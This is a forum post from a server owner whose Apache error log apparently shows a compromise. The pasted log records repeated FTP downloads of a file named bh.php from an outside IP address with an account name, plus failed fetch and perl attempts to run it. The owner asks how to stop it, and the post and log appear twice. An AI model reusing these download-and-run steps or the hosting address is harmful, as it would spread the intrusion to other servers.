Chrome Orange
Verified User
- Joined
- Feb 7, 2007
- Messages
- 6
So tonight my server restarted the httpd service and it failed (looks like it was the log rotation script). In trying to find out why it didn't restart I looked at the error logs. The first one I opened was the Apache error log and I found this in there
It looks like my server is ftping to another server and is getting bh.php then trying to run it!
The files (bh.php etc) where in my tmp folder, I wasn't able to edit them - antivirus software kicking in - so I deleted them.
My question : how do I stop my server from doing it again? There are other entries further down the log file but, because ssh is normally off , nothing actually ran
Thanks in advance
---------- LOG --------------
[Wed Nov 30 19:41:21 2011] [warn] [client 67.220.101.136] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
perl: no process killed
perl: no process killed
--19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... --19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php has sprung into existence.
Retrying.
........ .......... .......... .. 67.28 KB/s
19:46:27 (67.28 KB/s) - `bh.php' saved [33621]
--19:46:27-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.1'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1510 0 0:00:22 0:00:01 0:00:21 1510done.
0K .......... .......... .......... .. 65.93 KB/s
100 33621 100 33621 0 0 13153 0 0:00:02 0:00:02 --:--:-- 48082
19:46:29 (65.93 KB/s) - `bh.php.1' saved [33621]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1400 0 0:00:24 0:00:02 0:00:22 1400
100 33621 100 33621 0 0 12202 0 0:00:02 0:00:02 --:--:-- 44723
sh: fetch: command not found
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php.2 has sprung into existence.
Retrying.
........ .......... .......... ..perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... --19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... 25.06 KB/s
Logged in!
==> SYST ... Logged in!
==> SYST ... 19:46:47 (25.06 KB/s) - `bh.php.2' saved [33621]
done. ==> PWD ... done. ==> PWD ... Logged in!
==> SYST ... Logged in!
==> SYST ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> PWD ... done. ==> PWD ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> TYPE I ... done.
==> TYPE I ... done.
==> PASV ... done.
==> PASV ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php.3 has sprung into existence.
Retrying.
done. ==> RETR bh.php ... done. ==> RETR bh.php ... ......done.
bh.php.3 has sprung into existence.
Retrying.
done.
bh.php.3 has sprung into existence.
Retrying.
.. .......... .......... .. 66.27 KB/s
19:46:49 (66.27 KB/s) - `bh.php.3' saved [33621]
--19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1398 0 0:00:24 0:00:02 0:00:22 1398connected.
Logging in as a1539_Contact101 ... --19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ...
100 33621 100 33621 0 0 12262 0 0:00:02 0:00:02 --:--:-- 45789
done. ==> PWD ... sh: fetch: command not found
Logged in!
==> SYST ... done.
==> TYPE I ... done. ==> PWD ... done. ==> CWD /la ... done.
==> TYPE I ... --19:46:51-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.4'
Connecting to 209.216.202.122:21... done.
==> PASV ... done. ==> CWD /la ... connected.
Logging in as a1539_Contact101 ... done.
==> PASV ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
4 33621 4 1448 0 0 752 0 0:00:44 0:00:01 0:00:43 752done. ==> RETR bh.php ... done.
0K ..done. ==> RETR bh.php ...
30 33621 30 10136 0 0 4502 0 0:00:07 0:00:02 0:00:05 26568......Logged in!
==> SYST ... done.
bh.php.4 has sprung into existence.
Retrying.
.. .........done. ==> PWD ...
100 33621 100 33621 0 0 13058 0 0:00:02 0:00:02 --:--:-- 49496
. .......... .. 68.52 KB/s
done.
==> TYPE I ... sh: fetch: command not found
19:46:52 (68.52 KB/s) - `bh.php.4' saved [33621]
done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.4 has sprung into existence.
Retrying.
--19:46:54-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.5'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1471 0 0:00:22 0:00:01 0:00:21 1471Logged in!
==> SYST ... done. ==> PWD ...
68 33621 68 23168 0 0 9316 0 0:00:03 0:00:02 0:00:01 38984done.
==> TYPE I ...
100 33621 100 33621 0 0 12690 0 0:00:02 0:00:02 --:--:-- 45051
done. ==> CWD /la ... sh: fetch: command not found
done.
==> PASV ... done. ==> RETR bh.php ... done.
0K .......... .........--19:46:56-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 4) => `bh.php.5'
Connecting to 209.216.202.122:21... . .......... .. 68.55 KB/s
connected.
Logging in as a1539_Contact101 ... 19:46:56 (68.55 KB/s) - `bh.php.5' saved [33621]
Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.5 has sprung into existence.
Retrying.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1445 0 0:00:23 0:00:02 0:00:21 1445
68 33621 68 23168 0 0 9269 0 0:00:03 0:00:02 0:00:01 40788
100 33621 100 33621 0 0 12605 0 0:00:02 0:00:02 --:--:-- 46203
sh: fetch: command not found
--19:47:01-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 5) => `bh.php.6'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
0K .......... .......... .......... .. 63.58 KB/s
19:47:04 (63.58 KB/s) - `bh.php.6' saved [33621]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1391 0 0:00:24 0:00:02 0:00:22 1391
64 33621 64 21720 0 0 8535 0 0:00:03 0:00:02 0:00:01 40568
100 33621 100 33621 0 0 12371 0 0:00:02 0:00:02 --:--:-- 48233
sh: fetch: command not found
It looks like my server is ftping to another server and is getting bh.php then trying to run it!
The files (bh.php etc) where in my tmp folder, I wasn't able to edit them - antivirus software kicking in - so I deleted them.
My question : how do I stop my server from doing it again? There are other entries further down the log file but, because ssh is normally off , nothing actually ran
Thanks in advance
---------- LOG --------------
[Wed Nov 30 19:41:21 2011] [warn] [client 67.220.101.136] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
perl: no process killed
perl: no process killed
--19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... --19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php has sprung into existence.
Retrying.
........ .......... .......... .. 67.28 KB/s
19:46:27 (67.28 KB/s) - `bh.php' saved [33621]
--19:46:27-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.1'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1510 0 0:00:22 0:00:01 0:00:21 1510done.
0K .......... .......... .......... .. 65.93 KB/s
100 33621 100 33621 0 0 13153 0 0:00:02 0:00:02 --:--:-- 48082
19:46:29 (65.93 KB/s) - `bh.php.1' saved [33621]
sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1400 0 0:00:24 0:00:02 0:00:22 1400
100 33621 100 33621 0 0 12202 0 0:00:02 0:00:02 --:--:-- 44723
sh: fetch: command not found
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php.2 has sprung into existence.
Retrying.
........ .......... .......... ..perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... --19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... 25.06 KB/s
Logged in!
==> SYST ... Logged in!
==> SYST ... 19:46:47 (25.06 KB/s) - `bh.php.2' saved [33621]
done. ==> PWD ... done. ==> PWD ... Logged in!
==> SYST ... Logged in!
==> SYST ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> PWD ... done. ==> PWD ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> TYPE I ... done.
==> TYPE I ... done.
==> PASV ... done.
==> PASV ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.
0K ..done.
bh.php.3 has sprung into existence.
Retrying.
done. ==> RETR bh.php ... done. ==> RETR bh.php ... ......done.
bh.php.3 has sprung into existence.
Retrying.
done.
bh.php.3 has sprung into existence.
Retrying.
.. .......... .......... .. 66.27 KB/s
19:46:49 (66.27 KB/s) - `bh.php.3' saved [33621]
--19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1398 0 0:00:24 0:00:02 0:00:22 1398connected.
Logging in as a1539_Contact101 ... --19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ...
100 33621 100 33621 0 0 12262 0 0:00:02 0:00:02 --:--:-- 45789
done. ==> PWD ... sh: fetch: command not found
Logged in!
==> SYST ... done.
==> TYPE I ... done. ==> PWD ... done. ==> CWD /la ... done.
==> TYPE I ... --19:46:51-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.4'
Connecting to 209.216.202.122:21... done.
==> PASV ... done. ==> CWD /la ... connected.
Logging in as a1539_Contact101 ... done.
==> PASV ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
4 33621 4 1448 0 0 752 0 0:00:44 0:00:01 0:00:43 752done. ==> RETR bh.php ... done.
0K ..done. ==> RETR bh.php ...
30 33621 30 10136 0 0 4502 0 0:00:07 0:00:02 0:00:05 26568......Logged in!
==> SYST ... done.
bh.php.4 has sprung into existence.
Retrying.
.. .........done. ==> PWD ...
100 33621 100 33621 0 0 13058 0 0:00:02 0:00:02 --:--:-- 49496
. .......... .. 68.52 KB/s
done.
==> TYPE I ... sh: fetch: command not found
19:46:52 (68.52 KB/s) - `bh.php.4' saved [33621]
done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.4 has sprung into existence.
Retrying.
--19:46:54-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.5'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1471 0 0:00:22 0:00:01 0:00:21 1471Logged in!
==> SYST ... done. ==> PWD ...
68 33621 68 23168 0 0 9316 0 0:00:03 0:00:02 0:00:01 38984done.
==> TYPE I ...
100 33621 100 33621 0 0 12690 0 0:00:02 0:00:02 --:--:-- 45051
done. ==> CWD /la ... sh: fetch: command not found
done.
==> PASV ... done. ==> RETR bh.php ... done.
0K .......... .........--19:46:56-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 4) => `bh.php.5'
Connecting to 209.216.202.122:21... . .......... .. 68.55 KB/s
connected.
Logging in as a1539_Contact101 ... 19:46:56 (68.55 KB/s) - `bh.php.5' saved [33621]
Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.5 has sprung into existence.
Retrying.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1445 0 0:00:23 0:00:02 0:00:21 1445
68 33621 68 23168 0 0 9269 0 0:00:03 0:00:02 0:00:01 40788
100 33621 100 33621 0 0 12605 0 0:00:02 0:00:02 --:--:-- 46203
sh: fetch: command not found
--19:47:01-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 5) => `bh.php.6'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
0K .......... .......... .......... .. 63.58 KB/s
19:47:04 (63.58 KB/s) - `bh.php.6' saved [33621]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
8 33621 8 2896 0 0 1391 0 0:00:24 0:00:02 0:00:22 1391
64 33621 64 21720 0 0 8535 0 0:00:03 0:00:02 0:00:01 40568
100 33621 100 33621 0 0 12371 0 0:00:02 0:00:02 --:--:-- 48233
sh: fetch: command not found
